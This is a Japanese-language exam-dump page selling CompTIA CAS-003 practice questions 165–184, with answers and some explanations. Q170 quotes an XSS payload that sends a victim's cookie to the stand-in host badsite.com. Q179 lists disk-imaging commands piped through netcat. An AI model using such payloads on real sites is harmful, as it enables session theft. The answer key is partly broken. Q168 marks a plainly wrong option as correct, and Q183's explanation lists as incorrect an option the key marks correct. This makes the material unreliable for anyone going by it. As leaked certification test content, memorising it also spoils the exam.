2022年最新の実際のCAS-003問題集PDFで100%合格率を保証します [Q165-Q184]

Share

2022年最新の実際のFast2test CAS-003問題集PDFで100%合格率を保証します

無料CompTIA CAS-003試験問題と解答


CompTIA CAS-003 認定試験の出題範囲:

トピック出題範囲
トピック 1
  • ソフトウェアの脆弱性シナリオを考慮して、適切なセキュリティ管理策を選択してください
トピック 2
  • 企業を保護するためのリスク指標シナリオの分析
トピック 3
  • シナリオを前提として、クラウドと仮想化テクノロジーを安全なエンタープライズアーキテクチャに統合する
トピック 4
  • シナリオを前提として、リスク軽減戦略と管理を実行する
トピック 5
  • シナリオを分析し、ネットワークとセキュリティのコンポーネント、概念、およびアーキテクチャを統合して、セキュリティ要件を満たします
トピック 6
  • セキュリティ目標を達成するための多様なビジネスユニット間の相互作用の重要性を説明する
トピック 7
  • シナリオを前提として、通信およびコラボレーションソリューションを保護するための適切な制御を選択します
トピック 8
  • シナリオを前提として、調査方法を適用して業界の傾向と企業への影響を判断します
トピック 9
  • ビジネスと業界の影響および関連するセキュリティリスクを要約する
トピック 10
  • シナリオまたは出力を分析し、セキュリティ評価に適切なツールを選択します
トピック 11
  • シナリオを前提として、テクノロジーライフサイクル全体にセキュリティアクティビティを実装する

 

質問 165
An IT manager is concerned about the cost of implementing a web filtering solution in an effort to mitigate the risks associated with malware and resulting data leakage. Given that the ARO is twice per year, the ALE resulting from a data leak is $25,000 and the ALE after implementing the web filter is $15,000. The web filtering solution will cost the organization $10,000 per year. Which of the following values is the single loss expectancy of a data leakage event after implementing the web filtering solution?

  • A. $7,500
  • B. $10,000
  • C. $12,500
  • D. $15,000
  • E. $0

正解: A

解説:
The annualized loss expectancy (ALE) is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE). It is mathematically expressed as: ALE = ARO x SLE Single Loss Expectancy (SLE) is mathematically expressed as: Asset value (AV) x Exposure Factor (EF) SLE = AV x EF - Thus the Single Loss Expectancy (SLE) = ALE/ARO = $15,000 / 2 = $ 7,500

 

質問 166
A Chief Information Security Officer (CISO) recently changed jobs into a new industry. The CISO's first task is to write a new, relevant risk assessment for the organization. Which of the following help to the CISO find relevant risks to the organization? (Choose two.)

  • A. Define the threat model.
  • B. Hire a third-party consultant.
  • C. Conduct a regulatory audit.
  • D. Perform an attack path analysis.
  • E. Perform a penetration test.
  • F. Review the existing BIA.

正解: B,F

解説:
Explanation

 

質問 167
A company has created a policy to allow employees to use their personally owned devices. The Chief Information Officer (CISO) is getting reports of company data appearing on unapproved forums and an increase in theft of personal electronic devices.
Which of the following security controls would BEST reduce the risk of exposure?

  • A. Disk encryption on the local drive
  • B. Group policy to enforce failed login lockout
  • C. Implementation of email digital signatures
  • D. Multifactor authentication

正解: A

 

質問 168
The risk subcommittee of a corporate board typically maintains a master register of the most prominent risks to the company. A centralized holistic view of risk is particularly important to the corporate Chief Information Security Officer (CISO) because:

  • A. major risks identified by the subcommittee merit the prioritized allocation of scare funding to address cybersecurity concerns
  • B. IT systems are maintained in silos to minimize interconnected risks and provide clear risk boundaries used to implement compensating controls
  • C. corporate general counsel requires a single system boundary to determine overall corporate risk exposure
  • D. risks introduced by a system in one business unit can affect other business units in ways in which the individual business units have no awareness

正解: B

 

質問 169
Providers at a healthcare system with many geographically dispersed clinics have been fined five times this year after an auditor received notice of the following SMS messages:

Which of the following represents the BEST solution for preventing future fines?

  • A. Implement a secure text-messaging application for mobile devices and workstations.
  • B. Implement FTP services between clinics to transmit text documents with the information.
  • C. Implement a system that will tokenize patient numbers.
  • D. Write a policy requiring this information to be given over the phone only.
  • E. Provide a courier service to deliver sealed documents containing public health informatics.

正解: A

 

質問 170
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='
http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?

  • A. Input validation
  • B. Sandboxing
  • C. SIEM
  • D. DAM
  • E. WAF

正解: E

解説:
Explanation
The attack in this question is an XSS (Cross Site Scripting) attack. We can prevent this attack by using a Web Application Firewall.
A WAF (Web Application Firewall) protects a Web application by controlling its input and output and the access to and from the application. Running as an appliance, server plug-in or cloud-based service, a WAF inspects every HTML, HTTPS, SOAP and XML-RPC data packet. Through customizable inspection, it is able to prevent attacks such as XSS, SQL injection, session hijacking and buffer overflows, which network firewalls and intrusion detection systems are often not capable of doing. A WAF is also able to detect and prevent new unknown attacks by watching for unfamiliar patterns in the traffic data.
A WAF can be either network-based or host-based and is typically deployed through a proxy and placed in front of one or more Web applications. In real time or near-real time, it monitors traffic before it reaches the Web application, analyzing all requests using a rule base to filter out potentially harmful traffic or traffic patterns. Web application firewalls are a common security control used by enterprises to protect Web applications against zero-day exploits, impersonation and known vulnerabilities and attackers.

 

質問 171
A system owner has requested support from data owners to evaluate options for the disposal of equipment containing sensitive data. Regulatory requirements state the data must be rendered unrecoverable via logical means or physically destroyed. Which of the following factors is the regulation intended to address?

  • A. Remanence
  • B. E-waste
  • C. Deduplication
  • D. Sovereignty

正解: A

解説:
Data remanence is a real issue. Data remanence is the remaining data, or remnants, that remain on the media after formatting or drive wiping. The only way to ensure there are no data remnants is through physical destruction of the media.

 

質問 172
A security auditor suspects two employees of having devised a scheme to steal money from the company.
While one employee submits purchase orders for personal items, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegal activities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activity occurring in the future?

  • A. Background checks
  • B. Least privilege
  • C. Employee termination procedures
  • D. Job rotation

正解: D

解説:
Explanation
Job rotation can reduce fraud or misuse by preventing an individual from having too much control over an area.

 

質問 173
Developers are working on anew feature to add to a social media platform. Thew new feature involves users uploading pictures of what they are currently doing. The data privacy officer (DPO) is concerned about various types of abuse that might occur due to this new feature. The DPO state the new feature cannot be released without addressing the physical safety concerns of the platform's users. Which of the following controls would BEST address the DPO's concerns?

  • A. Removing all metadata in the uploaded photo file
  • B. Not displaying to the public who uploaded the photo
  • C. Forcing TLS for all connections on the platform
  • D. Increasing blocking options available to the uploader
  • E. Adding a one-hour delay of all uploaded photos

正解: E

 

質問 174
A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without external interaction from another user with elevated privileges. This requirement is BEST described as an implementation of:

  • A. collusion
  • B. an administrative control
  • C. least privilege
  • D. dual control
  • E. separation of duties

正解: E

解説:
Separation of duties requires more than one person to complete a task.

 

質問 175
A security analyst works for a defense contractor that produces classified research on drones. The contractor faces nearly constant attacks from sophisticated nation-state actors and other APIs.
Which of the following would help protect the confidentiality of the research data?

  • A. Use only in-house developed applications that adhere to strict SDLC security requirements
  • B. Purge all data remnants from client devices' volatile memory at regularly scheduled intervals
  • C. Use diverse components in layers throughout the architecture
  • D. Implement non-heterogeneous components at the network perimeter

正解: C

 

質問 176
A security administrator has been asked to select a cryptographic algorithm to meet the criteria of a new application. The application utilizes streaming video that can be viewed both on computers and mobile devices. The application designers have asked that the algorithm support the transport encryption with the lowest possible performance overhead.
Which of the following recommendations would BEST meet the needs of the application designers? (Select TWO).

  • A. Use AES in Electronic Codebook mode
  • B. Use RC4 with Fixed IV generation
  • C. Use AES with cipher text padding
  • D. Use RC4 with a nonce generated IV
  • E. Use RC4 in Cipher Block Chaining mode
  • F. Use AES in Counter mode

正解: D,F

解説:
In cryptography, an initialization vector (IV) is a fixed-size input to a cryptographic primitive that is typically required to be random or pseudorandom. Randomization is crucial for encryption schemes to achieve semantic security, a property whereby repeated usage of the scheme under the same key does not allow an attacker to infer relationships between segments of the encrypted message.
Some cryptographic primitives require the IV only to be non-repeating, and the required randomness is derived internally. In this case, the IV is commonly called a nonce (number used once), and the primitives are described as stateful as opposed to randomized. This is because the IV need not be explicitly forwarded to a recipient but may be derived from a common state updated at both sender and receiver side. An example of stateful encryption schemes is the counter mode of operation, which uses a sequence number as a nonce.
AES is a block cipher. Counter mode turns a block cipher into a stream cipher. It generates the next keystream block by encrypting successive values of a "counter". The counter can be any function which produces a sequence which is guaranteed not to repeat for a long time, although an actual increment-by-one counter is the simplest and most popular.

 

質問 177
The Chief Information Security Officer (CISO) at a large organization has been reviewing some security-related incidents at the organization and comparing them to current industry trends. The desktop security engineer feels that the use of USB storage devices on office computers has contributed to the frequency of security incidents. The CISO knows the acceptable use policy prohibits the use of USB storage devices. Every user receives a popup warning about this policy upon login. The SIEM system produces a report of USB violations on a monthly basis; yet violations continue to occur.
Which of the following preventative controls would MOST effectively mitigate the logical risks associated with the use of USB storage devices?

  • A. Deploy PKI to add non-repudiation to login sessions so offenders cannot deny the offense
  • B. Revise the corporate policy to include possible termination as a result of violations
  • C. Implement group policy objects
  • D. Increase the frequency and distribution of the USB violations report

正解: C

解説:
Explanation
A Group Policy Object (GPO) can apply a common group of settings to all computers in Windows domain.
One GPO setting under the Removable Storage Access node is: All removable storage classes: Deny all access.
This setting can be applied to all computers in the network and will disable all USB storage devices on the computers.

 

質問 178
A security analyst sees some suspicious entries in a log file from a web server website, which has a form that allows customers to leave feedback on the company's products. The analyst believes a malicious actor is scanning the web form. To know which security controls to put in place, the analyst first needs to determine the type of activity occurring to design a control. Given the log below:

Which of the following is the MOST likely type of activity occurring?

  • A. Fuzzing
  • B. Brute forcing
  • C. XSS scanning
  • D. SQL injection

正解: D

 

質問 179
As part of incident response, a technician is taking an image of a compromised system and copying the image to a remote image server (192.168.45.82). The system drive is very large but does not contain the sensitive data.
The technician has limited time to complete this task. Which of the following is the BEST command for the technician to run?

  • A. memdump /dev/sda1 | nc 192.168.45.82 3000
  • B. tar cvf - / | ssh 192.168.45.82 "cat - > /images/image.tar"
  • C. dd if=/dev/mem | scp - 192.168.45.82:/images/image.dd
  • D. dd if=/dev/sda | nc 192.168.45.82 3000

正解: D

 

質問 180
A pharmacy gives its clients online access to their records and the ability to review bills and make payments.
A new SSL vulnerability on a special platform was discovered, allowing an attacker to capture the data between the end user and the web server providing these services. After invest the new vulnerability, it was determined that the web services providing are being impacted by this new threat. Which of the following data types a MOST likely at risk of exposure based on this new threat? (Select TWO)

  • A. Personal health information
  • B. Cardholder data
  • C. Employee records
  • D. Corporate financial data
  • E. intellectual property

正解: A,B

 

質問 181
A systems administrator receives an advisory email that a recently discovered exploit is being used in another country and the financial institutions have ceased operations while they find a way to respond to the attack.
Which of the following BEST describes where the administrator should look to find information on the attack to determine if a response must be prepared for the systems? (Choose two.)

  • A. Bug bounty websites
  • B. Antivirus vendor websites
  • C. Hacker forums
  • D. CVE database
  • E. Company's legal department
  • F. Trade industry association websites

正解: C,D

 

質問 182
After several industry comnpetitors suffered data loss as a result of cyebrattacks, the Chief Operating Officer (COO) of a company reached out to the information security manager to review the organization's security stance. As a result of the discussion, the COO wants the organization to meet the following criteria:
- Blocking of suspicious websites
- Prevention of attacks based on threat intelligence
- Reduction in spam
- Identity-based reporting to meet regulatory compliance
- Prevention of viruses based on signature
- Project applications from web-based threats
Which of the following would be the BEST recommendation the information security manager could make?

  • A. Deploy a SIEM solution
  • B. Implement a WAF
  • C. Deploy a UTM solution
  • D. Reconfigure existing IPS resources
  • E. Implement an EDR platform

正解: C

 

質問 183
A penetration tester is inspecting traffic on a new mobile banking application and sends the following web request:
POST http://www.example.com/resources/NewBankAccount HTTP/1.1
Content-type: application/json
{
"account":
[
{ "creditAccount":"Credit Card Rewards account"}
{ "salesLeadRef":"www.example.com/badcontent/exploitme.exe"}
],
"customer":
[
{ "name":"Joe Citizen"}
{ "custRef":"3153151"}
]
}
The banking website responds with:
HTTP/1.1 200 OK
{
"newAccountDetails":
[
{ "cardNumber":"1234123412341234"}
{ "cardExpiry":"2020-12-31"}
{ "cardCVV":"909"}
],
"marketingCookieTracker":"JSESSIONID=000000001"
"returnCode":"Account added successfully"
}
Which of the following are security weaknesses in this example? (Select TWO).

  • A. Vulnerable to malware file uploads
  • B. Vulnerable to SQL injection
  • C. Sensitive details communicated in clear-text
  • D. Vulnerable to XSS
  • E. Missing input validation on some fields
  • F. JSON/REST is not as secure as XML

正解: C,E

解説:
The SalesLeadRef field has no input validation. The penetration tester should not be able to enter "www.example.com/badcontent/exploitme.exe" in this field.
The credit card numbers are communicated in clear text which makes it vulnerable to an attacker. This kind of information should be encrypted.
Incorrect Answers:
B: There is nothing to suggest the system is vulnerable to SQL injection.
D: There is nothing to suggest the system is vulnerable to XSS (cross site scripting).
E: Although the tester was able to post a URL to malicious software, it does not mean the system is vulnerable to malware file uploads.
F: JSON/REST is no less secure than XML.

 

質問 184
......

検証済みCAS-003問題集と解答で最新CAS-003をダウンロード:https://jp.fast2test.com/CAS-003-premium-file.html


弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

我々の働いている時間: ( GMT 0:00-15:00 )
月曜日から土曜日まで

サポート: 現在連絡 

English Deutsch 繁体中文 한국어